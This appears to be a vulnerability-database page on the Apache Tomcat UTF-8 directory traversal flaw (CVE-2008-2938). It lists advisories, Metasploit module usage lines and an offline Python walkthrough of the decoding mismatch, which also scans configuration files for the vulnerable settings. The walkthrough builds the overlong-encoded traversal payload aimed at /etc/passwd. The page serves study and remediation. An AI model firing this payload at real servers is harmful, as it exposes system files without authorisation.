Published: 13/08/2008 Updated: 25/03/2019
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 521
Vector: AV:N/AC:M/Au:N/C:P/I:N/A:N

Vulnerability Summary

Directory traversal vulnerability in Apache Tomcat 4.1.0 up to and including 4.1.37, 5.5.0 up to and including 5.5.26, and 6.0.0 up to and including 6.0.16, when allowLinking and UTF-8 are enabled, allows remote malicious users to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.

Affected Products

Vendor                      Product  Versions
Apache                      Tomcat   6.0.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.0.5, 6.0.6, 6.0.7, 6.0.8, 6.0.9, 6.0.10, 6.0.11, 6.0.12, 6.0.13, 6.0.14, 6.0.15
Apache Software Foundation  Tomcat   6.0.16

Vendor Advisories

Synopsis: Important: jbossweb security update. Type/Severity: Security Advisory: Important. Topic: An updated jbossweb package that fixes various security issues is now available for JBoss Enterprise Application Platform (JBoss EAP) 4.2 and 4.3. This update has been rated as having important security impact by the ...
Synopsis: Important: tomcat security update. Type/Severity: Security Advisory: Important. Topic: Updated tomcat packages that fix multiple security issues are now available for Red Hat Developer Suite 3. This update has been rated as having important security impact by the Red Hat Security Response Team D ...
Synopsis: Low: tomcat security update for Red Hat Network Satellite Server. Type/Severity: Security Advisory: Low. Topic: Updated tomcat packages that fix multiple security issues are now available for Red Hat Network Satellite Server. This update has been rated as having low security impact by the Red Hat Security ...
Synopsis: Important: tomcat security update. Type/Severity: Security Advisory: Important. Topic: Updated tomcat packages that fix several security issues are now available for Red Hat Application Server v2. This update has been rated as having important security impact by the Red Hat Security Response Team ...


/* Apache Tomcat < 6.0.18 UTF-8 Directory Traversal Vulnerability get /etc/passwd Exploit c0d3r: mywisdom thanks for not being lame to change exploit author tis is one of my linux w0rm module for user enumerations, i've dual os worm thanks to: gunslinger,flyf666,petimati,kiddies,xtr0nic,c0mrade,n0te,v3n0m,iblis muda,cr4wl3r thanks to: isa m said, ...
Title: Apache Tomcat Directory Traversal Vulnerability. Author: Simon Ryeo (bar4mi (at) gmail.com, barami (at) ahnlab.com). Severity: High. Impact: Remote File Disclosure. Vulnerable Version: prior to 6.0.18. Solution: - Best Choice: Upgrade to 6.0.18 (tomcat.apache.org) - Hot fix: Disable allowLinking or do not set URIEncoding to UTF-8 in order ...

Mailing Lists

The Oracle Containers For Java (OC4J) in the Oracle Application Server 10g suffers from a directory traversal vulnerability ...
Apache Tomcat versions prior to 6.0.18 suffer from a directory traversal vulnerability ...
ToutVirtual VirtualIQ Pro version 3.2 build 7882 suffers from cross site scripting, cross site request forgery, directory traversal, and code execution vulnerabilities ...

Metasploit Modules

Tomcat UTF-8 Directory Traversal Vulnerability

This module tests whether a directory traversal vulnerability is present in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0 - 6.0.16 under specific and non-default installations. The connector must have allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the vulnerability actually occurs within Java and not Tomcat; the server must use Java versions prior to Sun 1.4.2_19, 1.5.0_17, 6u11 - or prior IBM Java 5.0 SR9, 1.4.2 SR13, SE 6 SR4 releases. This module has only been tested against RedHat 9 running Tomcat 6.0.16 and Sun JRE 1.5.0-05. You may wish to change FILE (hosts,sensitive files), MAXDIRS and RPORT depending on your environment.

msf > use auxiliary/admin/http/tomcat_utf8_traversal
msf auxiliary(tomcat_utf8_traversal) > show actions
msf auxiliary(tomcat_utf8_traversal) > set ACTION <action-name>
msf auxiliary(tomcat_utf8_traversal) > show options
    ...show and set options...
msf auxiliary(tomcat_utf8_traversal) > run
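
The three conditions in the module description (allowLinking=true, URIEncoding=UTF-8, and a JVM whose UTF-8 decoder still accepts overlong sequences) fit together like this: %c0%ae is the two-byte overlong encoding of '.', Tomcat's byte-level path normalisation runs before the request bytes are converted to characters with the connector's URIEncoding, so it sees C0 AE C0 AE rather than '..'; the affected Java decoder then turns each %c0%ae%c0%ae into '..', and with allowLinking=true Tomcat skips the canonical-path comparison that would otherwise stop the path from leaving docBase. The Python below is an added, offline illustration written for this page; it is not the Metasploit module's code and nothing in it comes from the Tomcat project. The probe shape (a context path, a run of %c0%ae%c0%ae/ segments, then the target file), the docBase /opt/tomcat/webapps, the /examples context, the server.xml fragment and the passwd text are all constructed assumptions. It builds the probe the module's MAXDIRS loop would send, shows why a strict decoder rejects it while a lenient one yields '../..', works out where each depth lands on disk, checks a response for /etc/passwd content, and scans a server.xml for the vulnerable setting combination named in the advisory's hot fix.

```python
"""Offline model of the decoding mismatch behind CVE-2008-2938 (added example)."""
import posixpath
import re
import xml.etree.ElementTree as ET
from typing import Optional
from urllib.parse import unquote_to_bytes

# Two-byte overlong UTF-8 form of '.' (U+002E). A strict decoder rejects it;
# the Java releases named in the module description decoded it to '.'.
OVERLONG_DOT = "%c0%ae"


def build_probe_uri(context: str, depth: int, target_file: str) -> str:
    """Probe shaped like the module's loop (assumed shape): <context>/, then
    `depth` overlong '..' segments, then the file to read (FILE in msf)."""
    return "/" + context.strip("/") + "/" + (OVERLONG_DOT * 2 + "/") * depth + target_file.lstrip("/")


def has_dotdot_segment(path: str) -> bool:
    """What a '..' check sees when it runs before the charset decode: the
    overlong bytes are not the two ASCII dots it is looking for."""
    return any(seg == ".." for seg in path.split("/"))


def strict_utf8_decode(raw: bytes) -> Optional[str]:
    """Correct behaviour (Python's decoder): overlong forms are malformed."""
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def lenient_utf8_decode(raw: bytes) -> str:
    """Toy model of the pre-fix Java decoder: two-byte sequences are accepted
    without the shortest-form check, so C0 AE becomes '.'. Handles only ASCII
    and two-byte sequences; anything else raises."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))  # no overlong check
            i += 2
        else:
            raise ValueError("unsupported byte sequence at offset %d" % i)
    return "".join(out)


def resolve_on_disk(docbase: str, decoded_path: str) -> str:
    """Where the decoded path lands once it reaches the filesystem. With
    allowLinking=true Tomcat skips its canonical-path comparison, so the
    '..' segments walk out of docBase unchallenged."""
    return posixpath.normpath(docbase.rstrip("/") + decoded_path)


def depth_to_reach(docbase: str, context: str, target_file: str) -> int:
    """Smallest number of '..' segments that reaches target_file; the reason
    the module iterates up to MAXDIRS rather than guessing once."""
    for depth in range(1, 32):
        decoded = "/" + context.strip("/") + "/" + "../" * depth + target_file.lstrip("/")
        if resolve_on_disk(docbase, decoded) == target_file:
            return depth
    raise ValueError("target not reachable within 31 levels")


def looks_like_passwd(body: str) -> bool:
    """Response check: a root entry means the traversal returned /etc/passwd."""
    return re.search(r"^root:[^:]*:0:0:", body, re.M) is not None


def risky_tomcat_config(server_xml: str) -> bool:
    """True when a Connector sets URIEncoding=UTF-8 and a Context sets
    allowLinking=true, the combination the advisory's hot fix removes."""
    root = ET.fromstring(server_xml)
    utf8 = any(c.get("URIEncoding", "").lower() == "utf-8" for c in root.iter("Connector"))
    linking = any(c.get("allowLinking", "false").lower() == "true" for c in root.iter("Context"))
    return utf8 and linking


# Constructed samples (not captured from a real server).
SAMPLE_SERVER_XML = """<Server>
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" URIEncoding="UTF-8"/>
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps">
        <Context path="/examples" docBase="examples" allowLinking="true"/>
      </Host>
    </Engine>
  </Service>
</Server>"""
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\ntomcat:x:91:91::/usr/share/tomcat:/sbin/nologin\n"

if __name__ == "__main__":
    docbase, context = "/opt/tomcat/webapps", "/examples"
    depth = depth_to_reach(docbase, context, "/etc/passwd")
    uri = build_probe_uri(context, depth, "/etc/passwd")
    raw = unquote_to_bytes(uri)
    print("probe:", uri)
    print("'..' visible before charset decode:", has_dotdot_segment(uri))
    print("strict decode:", strict_utf8_decode(raw))
    print("lenient decode:", lenient_utf8_decode(raw), "->", resolve_on_disk(docbase, lenient_utf8_decode(raw)))
    print("config vulnerable:", risky_tomcat_config(SAMPLE_SERVER_XML))
```

Two points of the design are worth noting. The strict/lenient pair is the whole bug: the same bytes are a decoding error to one decoder and '..' to the other, which is why patching the JVM (or upgrading Tomcat) fixes it and why the advisory's hot fix works by removing either of the settings that let those bytes reach the decoder and the filesystem. The depth search shows that a single probe depth is not enough; the number of '..' segments needed depends on how deep the docBase sits, which is what MAXDIRS in the module accounts for.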

TrendMicro Data Loss Prevention 5.5 Directory Traversal

This module tests whether a directory traversal vulnerability is present in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294. The vulnerability appears to be actually caused by the Tomcat UTF-8 bug which is implemented in module tomcat_utf8_traversal (CVE-2008-2938). This module simply tests for the same bug with Trend Micro specific settings. Note that in the Trend Micro appliance, /etc/shadow is not used and therefore password hashes are stored in, and anonymously accessible from, the passwd file.

msf > use auxiliary/admin/http/trendmicro_dlp_traversal
msf auxiliary(trendmicro_dlp_traversal) > show actions
msf auxiliary(trendmicro_dlp_traversal) > set ACTION <action-name>
msf auxiliary(trendmicro_dlp_traversal) > show options
    ...show and set options...
msf auxiliary(trendmicro_dlp_traversal) > run

Github Repositories

Offensive technologies course. This repository contains descriptions of several vulnerabilities and the code that exploits them. Exploitable environments can be found in the /dockerfiles/victim folder; attacker environments can be found in the /dockerfiles/attacker folder. Everything comes as Docker images. Exploited CVEs: CVE-2008-2938 (Tomcat path traversal), CVE-2014-1904 (Spring pat